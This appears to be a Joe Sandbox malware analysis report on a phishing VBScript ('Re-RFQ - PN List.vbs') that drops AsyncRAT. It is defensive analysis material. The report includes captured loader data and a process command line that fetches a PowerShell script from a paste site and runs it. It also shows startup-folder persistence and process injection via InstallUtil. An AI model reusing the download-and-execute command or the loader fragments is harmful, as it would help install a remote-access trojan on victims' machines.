2022-05-16 17:29:33 UTC	1	IN	Data Raw: 31 63 32 36 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 69 6e 64 6f 77 73 2e 46 6f 72 6d 73 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 4d 61 6e 61 67 65 6d 65 6e 74 0d 0a 41 64 64 2d 54 79 70 65 20 2d 41 73 73 65 6d 62 6c 79 4e 61 6d 65 20 53 79 73 74 65 6d 2e 57 65 62 0d 0a 0d 0a 5b 42 79 74 65 5b 5d 5d 20 24 52 55 4e 50 45 20 3d 20 40 28 33 31 2c 31 33 39 2c 38 2c 30 2c 30 2c 30 2c 30 2c 30 Data Ascii: 1c26Add-Type -AssemblyName System.Windows.FormsAdd-Type -AssemblyName Microsoft.VisualBasicAdd-Type -AssemblyName Microsoft.CSharpAdd-Type -AssemblyName System.ManagementAdd-Type -AssemblyName System.Web[Byte[]] $RUNPE = @(31,139,8,0,0,0,0,0
2022-05-16 17:29:33 UTC	16	IN	Data Raw: 61 64 25 32 34 25 61 65 25 32 66 25 30 30 25 38 35 25 65 38 25 61 62 48 4d 25 66 61 25 61 61 25 39 61 37 25 31 36 25 62 65 25 61 32 5f 25 38 32 52 25 65 32 25 62 64 68 25 39 35 25 62 38 25 38 39 64 25 61 34 25 65 65 35 25 64 31 25 34 30 25 31 37 25 61 38 2d 64 25 32 63 25 38 35 25 38 31 25 35 62 25 34 30 25 63 65 50 25 63 36 25 39 36 25 34 30 25 30 66 25 65 61 6e 25 64 63 44 25 66 36 0d 0a 32 30 30 30 0d 0a 25 65 38 25 61 62 29 25 61 65 69 25 33 62 51 25 38 62 2e 25 38 31 6d 34 25 66 37 25 30 66 52 25 38 33 25 63 66 25 63 35 25 37 66 53 25 32 63 62 25 38 39 25 37 66 25 32 33 6e 54 25 31 35 25 62 66 25 61 34 25 63 34 42 25 64 37 25 31 31 7a 2a 25 38 35 25 64 36 25 64 31 58 25 62 62 25 30 33 5f 25 61 31 25 63 31 25 31 66 25 61 31 51 25 66 63 25 36 30 6a 25 Data Ascii: ad%24%ae%2f%00%85%e8%abHM%fa%aa%9a7%16%be%a2_%82R%e2%bdh%95%b8%89d%a4%ee5%d1%40%17%a8-d%2c%85%81%5b%40%ceP%c6%96%40%0f%ean%dcD%f62000%e8%ab)%aei%3bQ%8b.%81m4%f7%0fR%83%cf%c5%7fS%2cb%89%7f%23nT%15%bf%a4%c4B%d7%11z*%85%d6%d1X%bb%03_%a1%c1%1f%a1Q%fc%60j%
2022-05-16 17:29:33 UTC	32	IN	Data Raw: 25 38 32 25 65 30 25 31 62 25 37 64 25 39 66 42 25 66 62 69 25 34 30 25 61 66 25 31 38 2a 25 66 63 72 25 38 65 57 25 66 34 25 39 36 25 37 66 25 31 39 2d 25 64 66 5a 25 66 34 25 65 62 2a 25 35 64 25 35 63 25 65 62 25 32 35 25 61 39 25 63 61 25 39 36 25 63 64 41 25 63 32 25 66 62 73 25 38 38 72 69 25 66 31 43 25 63 62 74 31 25 61 66 25 31 33 25 66 63 25 39 32 25 65 37 25 61 63 25 61 61 25 38 62 70 25 31 36 25 38 64 25 66 38 25 33 64 0d 0a 32 30 30 30 0d 0a 25 38 36 25 38 36 25 66 62 37 25 63 35 25 65 66 25 31 30 6f 25 61 36 25 64 37 25 38 64 25 63 35 25 63 64 25 65 65 25 61 33 25 30 35 25 62 61 25 64 38 25 39 30 45 25 64 30 25 63 37 25 66 30 25 38 62 25 30 63 4f 31 25 62 63 25 39 33 25 65 31 25 32 33 25 64 63 25 65 36 25 32 35 25 38 36 25 63 66 25 62 61 25 Data Ascii: %82%e0%1b%7d%9fB%fbi%40%af%18%fcr%8eW%f4%96%7f%19-%dfZ%f4%eb%5d%5c%eb%25%a9%ca%96%cdA%c2%fbs%88ri%f1C%cbt1%af%13%fc%92%e7%ac%aa%8bp%16%8d%f8%3d2000%86%86%fb7%c5%ef%10o%a6%d7%8d%c5%cd%ee%a3%05%ba%d8%90E%d0%c7%f0%8b%0cO1%bc%93%e1%23%dc%e6%25%86%cf%ba%
2022-05-16 17:29:33 UTC	48	IN	Data Raw: 61 25 66 38 25 61 34 25 38 65 25 64 39 25 38 66 25 36 30 25 61 61 71 25 32 62 25 65 63 4e 25 62 36 25 32 36 25 39 33 25 66 31 25 66 30 25 66 38 25 31 63 25 61 61 28 25 61 63 25 61 34 31 25 66 36 45 25 64 33 25 62 34 25 64 31 25 64 33 34 74 46 25 30 38 25 30 64 25 32 66 25 61 32 25 62 35 25 32 36 25 31 32 25 61 31 25 64 39 25 66 31 25 63 38 25 33 63 25 64 62 25 37 65 25 39 61 25 62 63 68 25 64 64 2e 25 64 30 25 33 61 25 38 65 25 38 38 32 25 31 62 25 38 63 25 31 66 48 57 25 30 64 0d 0a 35 65 39 33 0d 0a 25 30 35 25 65 33 58 25 63 65 25 61 65 38 25 64 36 25 66 36 25 62 30 25 39 31 59 61 25 66 35 25 61 31 25 32 35 25 64 61 25 30 64 25 64 33 25 63 31 25 30 63 25 63 66 25 61 66 25 63 34 25 38 65 25 39 63 25 30 61 4f 25 63 66 25 63 35 39 55 25 33 62 25 62 66 25 Data Ascii: a%f8%a4%8e%d9%8f%60%aaq%2b%ecN%b6%26%93%f1%f0%f8%1c%aa(%ac%a41%f6E%d3%b4%d1%d34tF%08%0d%2f%a2%b5%26%12%a1%d9%f1%c8%3c%db%7e%9a%bch%dd.%d0%3a%8e%882%1b%8c%1fHW%0d5e93%05%e3X%ce%ae8%d6%f6%b0%91Ya%f5%a1%25%da%0d%d3%c1%0c%cf%af%c4%8e%9c%0aO%cf%c59U%3b%bf%
2022-05-16 17:29:33 UTC	64	IN	Data Raw: 39 25 39 66 43 25 62 61 25 64 38 6f 25 66 64 25 39 63 25 66 35 25 63 35 25 37 65 25 66 33 25 61 64 25 65 61 25 63 64 25 66 34 57 25 33 64 25 66 30 25 65 66 62 25 37 66 25 66 62 25 35 63 25 38 34 25 37 65 32 6e 73 34 34 25 39 37 25 38 63 25 30 37 25 32 33 25 31 37 25 66 62 53 5f 25 64 63 25 30 66 25 31 39 25 30 37 42 25 64 31 25 63 64 25 65 33 4d 4d 25 63 31 25 30 64 25 31 33 25 31 62 36 25 64 36 25 62 37 34 25 61 65 25 30 66 25 64 35 35 25 62 37 78 25 39 35 21 35 25 63 37 25 37 63 25 65 35 25 35 65 25 62 65 25 35 63 25 61 31 25 64 38 25 38 35 25 61 61 25 65 36 25 65 36 25 39 32 25 39 65 25 35 63 28 25 39 36 25 62 38 25 35 63 25 30 65 25 31 30 4a 25 66 32 25 33 64 25 31 37 25 65 62 42 25 32 62 71 25 61 39 2e 52 71 25 30 39 35 2a 71 25 61 61 25 62 61 4b 25 Data Ascii: 9%9fC%ba%d8o%fd%9c%f5%c5%7e%f3%ad%ea%cd%f4W%3d%f0%efb%7f%fb%5c%84%7e2ns44%97%8c%07%23%17%fbS_%dc%0f%19%07B%d1%cd%e3MM%c1%0d%13%1b6%d6%b74%ae%0f%d55%b7x%95!5%c7%7c%e5%5e%be%5c%a1%d8%85%aa%e6%e6%92%9e%5c(%96%b8%5c%0e%10J%f2%3d%17%ebB%2bq%a9.Rq%095*q%aa%baK%

Target ID:	0
Start time:	19:29:19
Start date:	16/05/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Imagebase:	0x7ff713c40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 6488, Parent PID: 7072

General

Target ID:	2
Start time:	19:29:28
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000002.00000002.535670022.000001B3C4BF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000002.00000002.527898174.000001B3B54C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exePID: 2796, Parent PID: 6488

General

Target ID:	3
Start time:	19:29:28
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 924, Parent PID: 6488

General

Target ID:	6
Start time:	19:29:39
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000006.00000003.432425896.0000024667561000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.508035247.000002464FAFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.508351680.000002464FBD5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000006.00000002.492233928.000002464EE2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 00000006.00000002.509443162.000002465EC34000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: csc.exePID: 6876, Parent PID: 924

General

Target ID:	8
Start time:	19:29:51
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Imagebase:	0x7ff71a4b0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: cvtres.exePID: 1112, Parent PID: 6876

General

Target ID:	9
Start time:	19:29:53
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Imagebase:	0x7ff7a0a80000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: wscript.exePID: 6944, Parent PID: 3688

General

Target ID:	10
Start time:	19:29:55
Start date:	16/05/2022
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Imagebase:	0x7ff713c40000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exePID: 7116, Parent PID: 6944

General

Target ID:	11
Start time:	19:29:59
Start date:	16/05/2022
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Imagebase:	0x7ff620040000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 0000000B.00000002.535852707.000001D39DE83000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.535314776.000001D38E80B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.532881754.000001D38E3D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RUNPE, Description: Yara detected RUNPE, Source: 0000000B.00000003.476766953.000001D3A6611000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000B.00000002.535498230.000001D38E8A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Analysis Process: conhost.exePID: 7140, Parent PID: 7116

General

Target ID:	12
Start time:	19:30:00
Start date:	16/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6406f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: InstallUtil.exePID: 6428, Parent PID: 924

General

Target ID:	14
Start time:	19:30:05
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xf20000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482202249.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 0000000E.00000002.910606131.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000002.909303813.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482568834.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.482880549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000E.00000000.483188159.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Analysis Process: csc.exePID: 6444, Parent PID: 7116

General

Target ID:	15
Start time:	19:30:10
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Imagebase:	0x7ff71a4b0000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Analysis Process: cvtres.exePID: 6680, Parent PID: 6444

General

Target ID:	16
Start time:	19:30:12
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Imagebase:	0x7ff7a0a80000
File size:	47280 bytes
MD5 hash:	33BB8BE0B4F547324D93D5D2725CAC3D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: InstallUtil.exePID: 1400, Parent PID: 7116

General

Target ID:	17
Start time:	19:30:23
Start date:	16/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Imagebase:	0xe20000
File size:	41064 bytes
MD5 hash:	EFEC8C379D165E3F33B536739AEE26A3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.522369238.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.521087043.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.521388482.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000002.532336594.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000011.00000000.522066240.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Re-RFQ - PN List.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: AsyncRAT

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\gia9ab2dg0.PS1

